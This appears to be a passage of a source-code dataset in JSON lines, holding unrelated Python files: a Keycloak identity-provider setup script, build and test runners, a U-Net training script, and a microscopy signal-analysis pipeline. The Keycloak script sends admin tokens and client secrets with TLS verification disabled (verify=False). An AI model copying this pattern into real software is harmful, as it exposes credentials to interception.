\"true\":\n enableHttpDebugLevel()\n\n username = os.environ[\"USER_NAME\"]\n password = os.environ[\"PASSWORD\"]\n adminClientId = os.environ[\"ADMIN_CLIENT_ID\"]\n keycloakHost = os.environ[\"KEYCLOAK_HOSTNAME\"]\n keycloakRealm = os.environ[\"KEYCLOAK_REALM\"]\n\n # get token\n access_token = getAccessToken(keycloakHost, os.environ[\"MASTER_REALM\"], username, password, adminClientId, False)\n \n # Create realm\n createRealm(keycloakHost, keycloakRealm, access_token, False)\n print(\"Set up Openshift identity provider on keycloak\")\n response = requests.post(\"{}/auth/admin/realms/{}/identity-provider/instances\".format(keycloakHost, keycloakRealm),\n headers = httpCommonHeaders(access_token),\n json = {\n \"addReadTokenRoleOnCreate\": \"\",\n \"alias\": \"openshift-v4\",\n \"authenticateByDefault\": False,\n \"config\": {\n \"baseUrl\": os.environ[\"OPENSHIFT_BROKER_API_SERVER\"],\n \"clientId\": os.environ[\"OPENSHIFT_BROKER_CLIENT_ID\"],\n \"clientSecret\": os.environ[\"OPENSHIFT_BROKER_CLIENT_SECRET\"],\n \"disableUserInfo\": \"\",\n \"hideOnLoginPage\": \"\",\n \"syncMode\": \"IMPORT\",\n \"useJwksUrl\": \"true\",\n },\n \"displayName\": os.environ[\"OPENSHIFT_BROKER_DISPLAY_NAME\"],\n \"enabled\": True,\n \"firstBrokerLoginFlowAlias\": \"first broker login\",\n \"linkOnly\": \"\",\n \"postBrokerLoginFlowAlias\": \"\",\n \"providerId\": \"openshift-v4\",\n \"storeToken\": \"\",\n \"trustEmail\": \"\",\n }, verify=False)\n\n if (response.status_code == 201 or response.status_code == 409):\n printResponse(response)\n \nexcept (KeyError): \n print(\"Please set the environment variable\")\n sys.exit(1)","repo_name":"otp-demo/rhsso-auto","sub_path":"openshift-brokering.py","file_name":"openshift-brokering.py","file_ext":"py","file_size_in_byte":2653,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"21126834389","text":"import argparse\nimport subprocess\nimport os\nimport shutil\n\n\nREPO_URL = \"https://github.com/vektra/mockery.git\"\nREPO_DIR = \"mockery_repo\"\nBINARY_NAME = \"mockery\"\n\n\ndef create_asset(target_dir):\n \"\"\"Create the asset.\"\"\"\n os.chdir(target_dir)\n\n # We build mockery 2.4.0 from source to fix an issue with Go 1.18. Read the\n # comments below for details.\n output = subprocess.check_output([\"git\", \"clone\", REPO_URL, REPO_DIR])\n print(output)\n os.chdir(os.path.join(target_dir, REPO_DIR))\n output = subprocess.check_output([\"git\", \"checkout\", \"v2.4.0\"])\n\n # Under Go 1.18, mockery v2.4.0 through v2.10.0 fails with errors such as:\n #\n # internal error: package \"fmt\" without types was imported from ...\n #\n # This can be fixed by updating golang.org/x/tools to a more recent version.\n # For more details, please see https://github.com/vektra/mockery/issues/434\n # and https://github.com/golang/go/issues/49608.\n output = subprocess.check_output([\"go\", \"get\", \"golang.org/x/tools@v0.1.10\"])\n print(output)\n output = subprocess.check_output([\"go\", \"mod\", \"tidy\"])\n print(output)\n\n # Build mockery with the same flags as in release builds.\n #\n # If we don't specify a SemVer value, mockery will generate files with a\n # \"Code generated by mockery v0.0.0-dev. DO NOT EDIT.\" comment at the top,\n # which causes diffs due to the changed version. Thus, it is important to set\n # the SemVer value to the correct version.\n #\n # See\n # https://github.com/vektra/mockery/blob/271c74610ef710a4c30e19a42733796c50e7ea3f/.goreleaser.yml#L9.\n ldflags = \"-s -w -X github.com/vektra/mockery/v2/pkg/config.SemVer=2.4.0\"\n build_command = [\"go\", \"build\", \"-ldflags=\\\"%s\\\"\" % ldflags]\n print(\"Building with command:\", build_command)\n output = subprocess.check_output([\"go\", \"build\", \"-ldflags=\" + ldflags])\n print(output)\n\n # Copy binary outside of the cloned repository directory and clean up.\n output = subprocess.check_output([\"cp\", BINARY_NAME, \"..\"])\n shutil.copy(os.path.join(target_dir, REPO_DIR, BINARY_NAME), target_dir)\n shutil.rmtree(os.path.join(target_dir, REPO_DIR))\n os.chdir(target_dir)\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('--target_dir', '-t', required=True)\n args = parser.parse_args()\n create_asset(args.target_dir)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"google/skia","sub_path":"infra/bots/assets/mockery/create.py","file_name":"create.py","file_ext":"py","file_size_in_byte":2325,"program_lang":"python","lang":"en","doc_type":"code","stars":8112,"dataset":"github-code","pt":"81"} +{"seq_id":"38422138358","text":"import torch\nimport cv2\nimport os\nimport glob\nfrom torch.utils.data import Dataset\nfrom torchvision import transforms\nimport random\nimport PIL.Image as Image\nimport torch.nn as nn\nimport torch.optim as optim\nimport numpy as np\nfrom Unet1 import Unet1\nimport matplotlib.pyplot as plt\n\n# 按批次取数据\nclass CAR_Loader(Dataset):\n def __init__(self, data_path):\n # 初始化函数,读取所有data_path下的图片\n self.data_path = data_path\n self.imgs_path = glob.glob(self.data_path+'/image/*.jpg')\n self.label_path = glob.glob(self.data_path+'/label/*.jpg')\n # 数据预处理,输入图片大小一致\n self.trans = transforms.Compose([\n transforms.Resize((512, 512)), #2^n\n transforms.ToTensor(),\n transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))])\n\n def __getitem__(self, index):\n # 根据index读取图片地址\n image_path = self.imgs_path[index]\n # 根据index读取label图片地址\n label_path = self.label_path[index]\n # 读取训练图片和标签图片\n image = Image.open(image_path)\n label = Image.open(label_path)\n # 图片预处理\n image = self.trans(image)\n label = self.trans(label)\n return image, label\n\n def __len__(self):\n # 返回训练集大小\n return len(self.imgs_path)\n\n\n# 训练模型\ndef fit_model(batch_1,epochs_1,lr,net,save_path):\n train_loss_l = []\n val_loss_l = []\n #参数设置\n lr = lr\n batch_size = batch_1\n epochs = epochs_1\n best_loss = 10.0\n # gpu or cpu\n device = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n print(\"using {} device.\".format(device))\n\n train_car_dataset = CAR_Loader(\"./data\")\n train_num = len(train_car_dataset)\n\n\n\n #读取图片时的线程数\n nw = min([os.cpu_count(), batch_size if batch_size > 1 else 0, 12]) # number of workers\n print('Using {} dataloader workers every process'.format(nw))\n\n train_loader = torch.utils.data.DataLoader(train_car_dataset,\n batch_size=batch_size, shuffle=True,\n num_workers=nw)\n val_car_dataset = CAR_Loader(\"./data\")\n val_num = len(val_car_dataset)\n validate_loader = torch.utils.data.DataLoader(val_car_dataset,\n batch_size=batch_size, shuffle=False,\n num_workers=nw)\n print(\"using {} images for training, {} images for validation.\".format(train_num,\n val_num))\n net.to(device)\n loss_function = nn.MSELoss()\n optimizer = optim.Adam(net.parameters(), lr)\n\n train_steps = len(train_loader)\n val_steps = len(validate_loader)\n\n for epoch in range(epochs):\n # train\n net.train()\n running1_loss = 0.0\n running2_loss = 0.0\n for data in train_loader:\n images, labels = data\n optimizer.zero_grad()\n # print(images.shape)\n outputs=net(images.to(device))\n loss = loss_function(outputs, labels.to(device))\n loss.backward()\n optimizer.step() # 根据反向传播区队优化器更新\n\n # print statistics\n running1_loss += loss.item()\n\n train_loss_l.append(running1_loss / train_steps)\n # validate\n net.eval()\n with torch.no_grad():\n for val_data in validate_loader:\n val_images, val_labels = val_data\n outputs = net(val_images.to(device)) # eval model only have last output layer\n val_loss = loss_function(outputs, val_labels.to(device))\n running2_loss += val_loss.item()\n\n val_loss_l.append(running2_loss / val_steps)\n\n print('[epoch %d] train_loss: %.3f val_loss: %.3f \\n' %\n (epoch + 1, running1_loss / train_steps, running2_loss / val_steps))\n\n if (running2_loss / val_steps) < best_loss:\n best_loss = (running2_loss / val_steps)\n torch.save(net.state_dict(), save_path) #找到最优loss,保存训练的权重和地址\n\n p = best_loss\n np.save('val_loss.npy', val_loss_l)\n np.save('train_loss.npy', train_loss_l)\n print('Finished Training')\n return p\n\n\ndef main():\n epoch = 100\n batch_size = 64\n lr = 0.0001\n save_path = './model.pth'\n net1 = Unet1()\n # net1.load_state_dict(torch.load('model.pth'))\n p1 = fit_model(batch_size, epoch, lr, net1, save_path)\n print(\" epoch(\", epoch, \") model train_max:\", p1)\n\n\nif __name__ == '__main__':\n main()","repo_name":"LeoLuo0115/MachineLearning_LicensePlateDetation_Project-","sub_path":"train_Unet.py","file_name":"train_Unet.py","file_ext":"py","file_size_in_byte":4797,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"18114612819","text":"import operator\r\ninstr = \"\"\"널 품기 전 알지 못했다. 내 머문 세상 이토록 찬란한 것을 작은 숨결로 닿은 사랑 겁없이 나를 불러준 사랑.\r\n몸시도 좋 았다 너를 지켜보고 설레고 우습게 지투도 했던 평번한 모든 순간들이 캄캄한 영원 그 오랜 기다림 속으로 햇살처럼 니가 내렸다.\"\"\"\r\ncdic = {}\r\nclist = []\r\nif __name__ == \"__main__\":\r\n for ch in instr:\r\n if \"ㄱ\" <= ch and ch <= \"힣\":\r\n if ch in cdic:\r\n cdic[ch]+=1\r\n else:\r\n cdic[ch] =1\r\n clist = sorted(cdic.items(),key = operator.itemgetter(1),reverse = True)\r\n print(\"원문\\n\",instr)\r\n print(\"--------------------\")\r\n print(\"문자 \\t 빈도수\")\r\n print(\"--------------------\")\r\n for i in range(0,len(clist)):\r\n print(clist[i][0], '\\t',clist[i][1])\r\n##2019038085_이현도##\r\n","repo_name":"leehyeondol/opensource_5week","sub_path":"기초-5주차과제2번-이현도.py","file_name":"기초-5주차과제2번-이현도.py","file_ext":"py","file_size_in_byte":901,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"16273229804","text":"import os\nimport logging\nimport json\nimport yaml\n\nfile_dir = os.path.dirname(__file__)\ndir_path = os.path.join(file_dir, '../')\npattern_root = os.path.abspath(dir_path)\n\n\ndef mkdirs(path):\n if not os.path.exists(path):\n os.makedirs(path)\n\n\ndef log_dir():\n path = os.path.join(pattern_root, 'logs')\n mkdirs(path)\n return path\n\n\ndef system(cmd):\n import subprocess\n ret = subprocess.call(cmd, shell=True)\n return ret\n\n\ndef events():\n ret = ['configure']\n\n parameters = read_parameters()\n if 'cloudconductor' in parameters and \\\n parameters['cloudconductor'] is not None and \\\n 'applications' in parameters['cloudconductor'] and \\\n parameters['cloudconductor']['applications'] is not None:\n ret.append('deploy')\n\n return ret\n\n\ndef execute_serverspec(roles):\n ret = 0\n\n roles.insert(0, 'all')\n event_list = events()\n\n test_root = os.path.join(pattern_root, 'serverspec')\n spec_dir = os.path.join(test_root, 'spec')\n\n for role in roles:\n for event in event_list:\n spec_file = os.path.join(\n spec_dir, role, role + '_' + event + '_spec.rb')\n if os.path.exists(spec_file):\n logging.info('execute serverspec with [%s].', spec_file)\n\n cmd = 'cd ' + test_root + \\\n '; rake spec[' + role + ',' + event + ']'\n result = system(cmd)\n\n if result == 0:\n logging.info('finished successfully.')\n else:\n logging.error('finished abnormally.')\n ret = 1\n\n else:\n logging.info(\n 'spec file [%s] does not exist. skipped.', spec_file)\n\n return ret\n\n\ndef env(name):\n return os.environ.get(name)\n\n\ndef token_key():\n return env('CONSUL_SECRET_KEY')\n\n\ndef consul_kv_get(key):\n import consul\n c = consul.Consul()\n index, data = c.kv.get(key, token=token_key())\n obj = json.loads(data['Value'])\n return obj\n\n\ndef read_parameters():\n try:\n ret = consul_kv_get('cloudconductor/parameters')\n except Exception as e:\n logging.warn(\"%s: %s\", type(e), e.message)\n ret = {}\n return ret\n\n\nif __name__ == '__main__':\n import sys\n argvs = sys.argv\n argc = len(argvs)\n\n roles = argvs[1].split(',')\n\n LOG_FILE = os.path.join(log_dir(), 'event-handler.log')\n logging.basicConfig(filename=LOG_FILE,\n format='[%(asctime)s] %(levelname)s: %(message)s',\n level=logging.DEBUG)\n\n ret = execute_serverspec(roles)\n exit(ret)\n","repo_name":"cloudconductor-patterns/zabbix_pattern","sub_path":"lib/serverspec.py","file_name":"serverspec.py","file_ext":"py","file_size_in_byte":2634,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"15455553198","text":"# Definition for singly-linked list.\nclass ListNode:\n def __init__(self, x):\n self.val = x\n self.next = None\n\nclass Solution:\n def mergeKLists(self, lists: List[ListNode]) -> ListNode:\n current = []\n head = resultCurrent = ListNode(0)\n \n for i in range(len(lists)):\n current.append(lists[i])\n \n\n def argmin(listCurrents:[ListNode]):\n \n currentVal = 9999999\n currentIdx = -1\n\n for i in range(len(listCurrents)):\n if listCurrents[i]:\n if listCurrents[i].val < currentVal:\n currentVal = listCurrents[i].val\n currentIdx = i\n \n return currentIdx\n \n idx = argmin(current)\n while idx != -1:\n resultCurrent.next = current[idx]\n resultCurrent = current[idx]\n current[idx] = current[idx].next\n idx = argmin(current)\n\n return head.next","repo_name":"sqlxx/algo-python","sub_path":"merge_k_sorted_list.py","file_name":"merge_k_sorted_list.py","file_ext":"py","file_size_in_byte":1019,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"20927152992","text":"'''s8_210316_dj.py is from s8_210315.py\r\n imports organized\r\n with 2 new user inputs at start of execution:\r\n - ask whether to execute interactive graphics function\r\n - ask what thresholding method to use\r\n'''\r\n\r\n\r\n# Standard imports\r\nimport numpy as np #best friend\r\nimport os #selecting files\r\nimport time #timing\r\nimport sys #input arguements\r\nimport psutil #memory watching\r\nfrom tqdm import tqdm # progress bar\r\nimport tkinter as tk #for gui to select variables\r\nfrom tkinter import filedialog #to open manager to select folders\r\nimport time\r\n\r\n# Reading/writing files\r\nimport pickle as pkl #writing output file\r\nfrom pims import TiffStack #reading tif data\r\nfrom tifffile import imsave #saving tif images\r\nimport csv #saving csv files\r\n\r\n# Thresholding and cropping\r\nfrom skimage import morphology #multicrop\r\nfrom skimage.filters import threshold_triangle, threshold_yen,threshold_otsu, gaussian # adaptive_thresholding\r\nfrom skimage.measure import label, regionprops # multicrop and three tracker for both\r\nfrom scipy import stats #adaptive_thresholding but commented out\r\n\r\n# Filtering\r\nfrom scipy.signal import savgol_filter # new function for sav filter\r\n#from math import factorial #used in defined savitzky_golay function\r\n#from skimage.restoration import(denoise_tv_chambolle) #used in savitzky_golay but commented out\r\n\r\n# Graphics\r\nimport matplotlib as mpl \r\nimport matplotlib.pyplot as plt \r\nimport matplotlib.cm as cm \r\nfrom matplotlib.backends.backend_pdf import PdfPages \r\nfrom mpl_toolkits.mplot3d import Axes3D \r\n\r\n\r\n\r\n\r\n# Interactive Graphics\r\n#import pandas as pd \r\n#from bokeh.plotting import figure, output_file, show\r\n#from bokeh.layouts import row \r\n#import plotly.express as px \r\n#import plotly.graph_objects as go \r\n#import dash_html_components as html \r\n#from plotly.subplots import make_subplots \r\n\r\n# Not used\r\n#from skimage import util, filters, img_as_uint\r\n#import trackpy as tp \r\n#import matplotlib.style \r\n#import math \r\n#import scipy\r\n#import pims \r\n#import skimage \r\n#import matplotlib.patches as mpatches \r\n#from pims import Frame \r\n#from PIL import Image \r\n#import dash \r\n#import dash_core_components as dcc \r\n#from dash.dependencies import Input, Output \r\n\r\n#######################################################################################\r\nt_start = time.time()\r\nstart_ram = psutil.virtual_memory()[3]/1000000000\r\n\r\ndef adaptive_thresholding(yval, var_otsu, var_gate, value_inside):\r\n\r\n #tau = np.divide(np.multiply(np.shape(yval)[1],np.shape(yval)[2]),50000) #probably should have a check for image dims...\r\n #print(tau)\r\n if var_otsu:\r\n tau = 0.95\r\n else:\r\n tau = 0\r\n #tau = np.std(yval[0], axis = 0)\r\n #tau = np.mean(tau)\r\n #tau = 100*np.divide(tau, data_max)\r\n #print(tau)\r\n #---------------------------------------\r\n #Blur and Noise Gating\r\n #-------------------------------------------\r\n yval = np.array(yval, dtype=np.int32)\r\n #mode filter\r\n #-----------------------------------------\r\n #mode = stats.mode(yval, axis = 0)\r\n #nf = np.clip(yval,a_min = 0, a_max = mode[0][0])\r\n #rf = stats.mode(nf, axis = 0)\r\n #yval = yval - np.multiply(rf[0],0.3)\r\n #---------------------------------------\r\n #mean filter\r\n mean_floor = np.mean(yval, axis = 0)\r\n nf = np.clip(yval, a_min = 0, a_max = mean_floor)\r\n rf = np.mean(nf, axis = 0)\r\n rf = np.array(rf, dtype=np.uint32)\r\n if var_gate:\r\n yval = yval - np.multiply(rf,1.4)\r\n else:\r\n yval = yval\r\n yval[yval < 0] = 0\r\n yval = np.array(yval, dtype=np.int16)\r\n #imsave(raw_path + '/' +filename + '_floor.tif', yval) #save the mask\r\n #print(nf)\r\n #yval = yval - np.median(yval, axis = 0) - np.std(yval, axis = 0)\r\n #---------------------------------------------------------\r\n ##yval = np.array(yval)\r\n #imsave(raw_path +\"/\" + filename + \"_filtered.tif\", yval)\r\n print('tau: {0}'.format(str(tau)))\r\n blurred = gaussian(yval, sigma = (0,tau, tau)) #blur the image\r\n if value_inside in ['Otsu']:\r\n gauss_thresh = threshold_otsu(blurred[:]) #find the threshold\r\n elif value_inside in ['Yen']:\r\n gauss_thresh = threshold_yen(blurred[:])\r\n elif value_inside in ['Triangle']:\r\n gauss_thresh = threshold_triangle(blurred[:])\r\n\r\n binary_gauss = blurred > gauss_thresh #convert to binary\r\n #binary_gauss_image = np.asarray(binary_gauss, dtype = 'uint8')#convert to boolean #IS THIS USED?\r\n #imsave(raw_path + '/' +filename + '_binary.tif', binary_gauss_image) #save the mask\r\n binary_gauss = np.asarray(binary_gauss, dtype = bool) #convert to boolean\r\n return binary_gauss\r\ndef masker(binary_gauss, yval):\r\n mask = np.multiply(binary_gauss,yval) #make the mask\r\n m_file = temp_full_filename.replace('.tif','_mask.tif')\r\n imsave(m_file, mask) #save the mask \r\n return mask\r\ndef masker_sum(mask):\r\n sum_mask = np.sum(mask,axis=0,dtype='uint64') #create the summed mask\r\n #imsave(raw_path + \"/\" + filename + '_sum_mask.tif', sum_mask) \r\n return sum_mask\r\ndef particle_sum(binary_gauss):\r\n sum_particle = np.sum(binary_gauss, axis=0,dtype='uint32') #render the binary #MADE uint64 INCASE DATA FILE IS 32BIT \r\n sum_particle[sum_particle != 0] = 255 #scale the binary for viewing #THIS FORCES 8BIT IMAGE, IS THAT OK?\r\n #imsave(raw_path + \"/\" + filename + '_sum_particle.tif',sum_particle)\r\n return sum_particle\r\ndef multicrop(sum_particle, binary_gauss, mask):\r\n label_sum = label(sum_particle)\r\n label_sum = morphology.remove_small_objects(label_sum,min_size = 10, in_place = True, connectivity = 2)# slice filtering \r\n boxes = [region.bbox for region in regionprops(label_sum)]\r\n boxes = np.asarray(boxes, dtype = int)\r\n #print(len(boxes))\r\n #print(label_sum)\r\n label_sum = np.asarray(label_sum, dtype='uint8') #DONT THINK THIS IS USED AFTER HERE, SO uint8 CAN STAY?\r\n cropped_mask = {x: mask[:,boxes[x][0]:boxes[x][2],boxes[x][1]:boxes[x][3]] for x in range(len(boxes))}\r\n\t\r\n #[imsave(raw_path +\"/\" + filename + \"_cropped\" + str(key) +\".tif\",cropped_mask[key]) for key in cropped_mask]\r\n #print(boxes)\r\n #return np.array(list(cropped_mask[2]))\r\n return cropped_mask, boxes\r\n #---------------------------------------------------------------------------------------------------------------\r\n# Three Tracker\r\n#---------------------------------------------------------------------------------------------------------------- \r\ndef three_tracker(tal, k, cropped_mask, boxes, raw_path):\r\n #print(\"ram before flab:\",psutil.virtual_memory()[3]/1000000000-start_ram)\r\n #intensity_image = cropped_mask\r\n #imsave(raw_path + '/' +filename + '_intensity.tif', intensity_image) #save the mask\r\n cropped_binary = cropped_mask.astype(bool).astype(int)\r\n #cropped_binary = adaptive_thresholding(cropped_mask, 0)\r\n #problem area\r\n #cropped_binary[cropped_binary != 0] = 155 \r\n sum_particle = np.sum(cropped_binary, axis=0,dtype='uint32') #render the binary \r\n sum_particle[sum_particle != 0] = 255 #scale the binary for viewing\r\n sum_mask = np.sum(cropped_mask,axis=0,dtype='uint32') #create the summed mask\r\n f_lab = label(cropped_binary)\r\n #print(\"ram after flab:\",psutil.virtual_memory()[3]/1000000000-start_ram) \r\n #f_lab = morphology.remove_small_objects(f_lab,min_size = 5000, in_place = True, connectivity = 3)# voxel filtering \r\n point = [region.centroid for region in regionprops(f_lab)]\r\n f_coords = [region.coords for region in regionprops(f_lab)] \r\n f_box = [region.bbox for region in regionprops(f_lab)] \r\n point = np.asarray(point, dtype = int)\r\n point = point[:,(1,2)]\r\n sum_label = label(sum_particle)\r\n sum_coords = [region.coords for region in regionprops(sum_label)] \r\n sum_coords = np.asarray(sum_coords) \r\n label_sum = label(sum_particle)\r\n sites = np.max(label_sum) \r\n events = {} \r\n serial = {}\r\n print(\"time series analysis:\") \r\n #The splitting code\"\r\n sum_box = np.array([region.bbox for region in regionprops(label_sum)])\r\n #print(sum_box)\r\n #print(len(sum_box)) \r\n obj = {}\r\n obj = [f_lab[:, sum_box[x,0]:sum_box[x,2], sum_box[x,1]:sum_box[x,3]] for x in range(len(sum_box))] #do the subslicing\r\n #obj = f_lab\r\n obj[0] = np.asarray(obj[0], dtype = 'uint8')\r\n #imsave(raw_path + \"/\" + filename + \"_obj.tif\", obj[0])\r\n #rint(boxes[k-1])\r\n \r\n \r\n for i in tqdm(range(len(point))): \r\n t0 = time.time()\r\n binary_region = f_lab == i+1 \r\n t1 = time.time()\r\n #print(t1-t0)\r\n binary_region[binary_region > 1 ] = 1\r\n t2 = time.time()\r\n #print(t2-t1) \r\n spacers = np.zeros(((2*len(binary_region)))*len(binary_region[0,:])*len(binary_region[0,0,:])) \r\n spacers = spacers.reshape((2*len(binary_region)),len(binary_region[0,:]),len(binary_region[0,0,:]))\r\n spacers[0::2] = binary_region\r\n space_lab = label(spacers)\r\n #space_lab = morphology.remove_small_objects(space_lab,min_size = 500, in_place = True, connectivity = 2)# slice filtering \r\n space_lab = space_lab[0::2] \r\n particle_mask = np.zeros_like(f_lab)\r\n particle_mask[f_box[i][0]:f_box[i][3],f_box[i][1]:f_box[i][4],f_box[i][2]:f_box[i][5]] = np.multiply(space_lab[f_box[i][0]:f_box[i][3],f_box[i][1]:f_box[i][4],f_box[i][2]:f_box[i][5]], binary_region[f_box[i][0]:f_box[i][3],f_box[i][1]:f_box[i][4],f_box[i][2]:f_box[i][5]])\r\n t3 = time.time()\r\n #print(t3-t2)\r\n p_amp = [region.mean_intensity for region in regionprops(particle_mask, intensity_image = cropped_mask)]\r\n #print(p_amp)\r\n t4 = time.time()\r\n #print(t4-t3)\r\n p_area = [region.area for region in regionprops(particle_mask)] \r\n t5 = time.time()\r\n #print(np.max(p_area))\r\n #print(t5-t4)\r\n p_cent = [region.centroid for region in regionprops(particle_mask)]\r\n #p_cent = list(p_cent)\r\n #print(p_cent[0])\r\n t6 = time.time()\r\n #print(t6-t5)\r\n p_region = [region.coords for region in regionprops(particle_mask)] \r\n t7 = time.time()\r\n #print(t7-t6)\r\n p_cent = np.asarray(p_cent)\r\n t8 = time.time()\r\n #print(t8-t7)\r\n p_coords = np.vstack(p_region)\r\n t9 = time.time()\r\n #print(t9-t8)\r\n p_region = np.asarray(p_region, dtype=object)\r\n t10 = time.time()\r\n #print(t10-t9)\r\n first_frame = p_cent[0,0]\r\n t11 = time.time()\r\n #print(t11-t10)\r\n area_freq = np.unique(p_cent[:,0],return_counts = True)\r\n t12 = time.time()\r\n #print(t12-t11)\r\n divergence = False\r\n convergence = False\r\n if(np.max(area_freq[1])>1):\r\n if(np.diff(area_freq[1]).any()>0):\r\n divergence = True \r\n if(np.diff(area_freq[1]).any()<0):\r\n convergence = True \r\n split_status = np.array([divergence,convergence])\r\n wave = False\r\n #print(np.diff(p_cent[:,1]))\r\n if((np.max(p_cent[:,1])-np.min(p_cent[:,1]) or np.max(p_cent[:,2])-np.min(p_cent[:,2]))>5):\r\n wave = True\r\n #print(len(regionprops(particle_mask)))\r\n #imsave(filename + str(i) +\"_particle_test\", np.asarray(particle_mask,dtype=np.uint8)) \r\n #for site in range(0,len(sum_coords)):\r\n #index_match = (point[i] == sum_coords[site]).all(axis = 1).any() \r\n #print(\"index match: \", index_match) \r\n events[tal +i] = np.array([p_area,np.max(p_area),p_cent,len(regionprops(particle_mask)),p_amp,np.max(p_amp)-np.min(p_amp),first_frame,p_region[0],\r\n p_coords,split_status,area_freq,np.diff(area_freq[1]),wave,np.tile(boxes[k],(len(regionprops(particle_mask)),1)),np.tile(boxes[k],(len(p_coords),1)),\r\n np.tile(boxes[k],(len(p_region[0]),1))],dtype=object) \r\n\t\t\r\n t13 = time.time()\r\n #events.clear()\r\n #print(t13-t12)\r\n #pkl.dump( events, open( raw_path + \"/\" +filename + \"_raw.p\", \"wb\" ) )\r\n return events, len(point)\r\n\r\n\r\n\r\ndef graphics(sites,binary_gauss,sum_particle,sum_mask,mask):\r\n events = np.array(list(sites.values()),dtype=object)\r\n areas = np.concatenate(events[:,0]).ravel()\r\n amps = np.concatenate(events[:,4]).ravel()\r\n amps = amps.astype(int)\r\n \r\n cents = np.concatenate(events[:,2]).ravel()\r\n cents = cents.reshape(((len(cents)//3),3))\r\n \r\n boxes = np.concatenate(events[:,13]).ravel()\r\n boxes = boxes.reshape(((len(boxes)//4),4))\r\n \r\n box_offset = np.concatenate(events[:,14]).ravel()\r\n box_offset = box_offset.reshape(((len(box_offset)//4),4)) \r\n \r\n cents[:,1] = cents[:,1] + boxes[:,0]\r\n cents[:,2] = cents[:,2] + boxes[:,1]\r\n \r\n cors = np.array(events[:,8])\r\n coords = np.concatenate(cors).ravel()\r\n coords = coords.reshape(((len(coords)//3),3))\r\n \r\n coords[:,1] = coords[:,1] + box_offset[:,0]\r\n coords[:,2] = coords[:,2] + box_offset[:,1]\r\n \r\n # print(\"coords: \", coords)\r\n #print(\"len: \", len(coords))\r\n #print(\"cents: \", cents)\r\n #print(\"len: \", len(box_offset))\r\n\r\n starts = np.concatenate(events[:,7]).ravel()\r\n starts = starts.reshape(((len(starts)//3),3))\r\n #print(starts)\r\n start_offset = np.concatenate(events[:,15]).ravel()\r\n start_offset = start_offset.reshape(((len(start_offset)//4),4)) \r\n \r\n starts[:,1] = starts[:,1] + start_offset[:,0]\r\n starts[:,2] = starts[:,2] + start_offset[:,1]\r\n\r\n # create color maps so each event gets a distinct color\r\n event_colors = cm.tab20b(np.linspace(.15, 0.6, len(events)))\r\n area_colors = []\r\n coords_colors = []\r\n coorz_colors = []\r\n starts_colors = []\r\n for i in range(len(events)):\r\n for x in events[i][0]:\r\n area_colors.append(event_colors[i])\r\n for x in events[i][8]:\r\n coords_colors.append(event_colors[i])\r\n for x in events[i][8]:\r\n coorz_colors.append(event_colors[i,0])\r\n for x in events[i][7]:\r\n starts_colors.append(event_colors[i])\r\n\r\n \r\n #print(amps)\r\n \r\n #print(areas)\r\n mpl.style.use('tableau-colorblind10') \r\n with PdfPages(raw_path + \"/\" + filename +\"_signal_report.pdf\") as pdf: \r\n mask_page1 = plt.figure(figsize=(16, 9), dpi=300)\r\n plt.rcParams.update({'font.size': 12})\r\n plt.subplot(1,3,1)\r\n plt.scatter(np.random.uniform(0.95,1.05,size=len(events[:,1])),events[:,1],edgecolors='black', c = event_colors) \r\n plt.xlim(0.9,1.1)\r\n plt.xticks([])\r\n plt.ylabel('maximal area (um^2)')\r\n plt.subplot(1,3,2)\r\n plt.title(\"Signal Descriptors\")\r\n plt.scatter(np.random.uniform(0.95,1.05,size=len(events[:,3])),events[:,3],edgecolors='black', c = event_colors)\r\n plt.xlim(0.9,1.1)\r\n plt.xticks([])\r\n plt.ylabel('duration (s)')\r\n plt.subplot(1,3,3)\r\n plt.scatter(np.random.uniform(0.95,1.05,size=len(events[:,5])),events[:,5],edgecolors='black', c = event_colors)\r\n plt.xlim(0.9,1.1)\r\n plt.xticks([])\r\n plt.ylabel('maximal intensity (delta f)')\r\n #txt=\"Figure 1. Event parameter strip charts. Maximal area (u^2), total duration (s), and maximal intensity (f) are plotted as points.\"\r\n #plt.figtext(0.5, 0.01, txt, wrap=True, horizontalalignment='center', fontsize=14)\r\n pdf.savefig()\r\n mask_page2 = plt.figure(figsize=(11, 8.5), dpi=300) \r\n im2 = plt.imshow(sum_mask,cmap='magma', interpolation='gaussian')\r\n plt.colorbar(im2)\r\n plt.title(\"Signal Time Lapse\")\r\n #txt=\"Figure 2. Event masks. The filtered and summed image is shown overlayed with its particle mask.\"\r\n #plt.figtext(0.5, 0.01, txt, wrap=True, horizontalalignment='center', fontsize=14)\r\n pdf.savefig() \r\n #cb.remove()\r\n mask_page3 = plt.figure(figsize=(11, 8.5), dpi=300)\r\n plt.rcParams.update({'font.size': 12})\r\n plt.subplot(1,1,1)\r\n im1 = plt.imshow(sum_particle, cmap = 'inferno')\r\n cb = plt.colorbar(im1)\r\n plt.title(\"Signal Locations\")\r\n #txt=\"Figure 3. The particle mask.\"\r\n #plt.figtext(0.5, 0.01, txt, wrap=True, horizontalalignment='center', fontsize=14)\r\n pdf.savefig()\r\n mask_page4 = plt.figure(figsize=(11, 8.5), dpi=300)\r\n plt.subplot(2,1,1)\r\n plt.scatter(cents[:,0],areas,edgecolors='black',linewidths=0.2, c = area_colors) \r\n #[plt.scatter(events[key][2][:,0],events[key][0],edgecolors='black',linewidths=0.2) for key in events]\r\n plt.title(\"Signal Time Course \")\r\n plt.ylabel('area (um^2)')\r\n plt.xlabel('time (s)')\r\n #plt.ylim(0,np.max(events[:,1])+10)\r\n plt.xlim(0,len(binary_gauss))\r\n plt.subplot(2,1,2)\r\n plt.scatter(cents[:,0],amps,edgecolors='black',linewidths=0.2, c = area_colors) \r\n plt.ylabel('intensity (f)')\r\n plt.xlabel('time (s)')\r\n #plt.ylim(0,300)\r\n plt.xlim(0,len(binary_gauss))\r\n #txt=\"Figure 4. Area and Intensity versus time plots. The time course 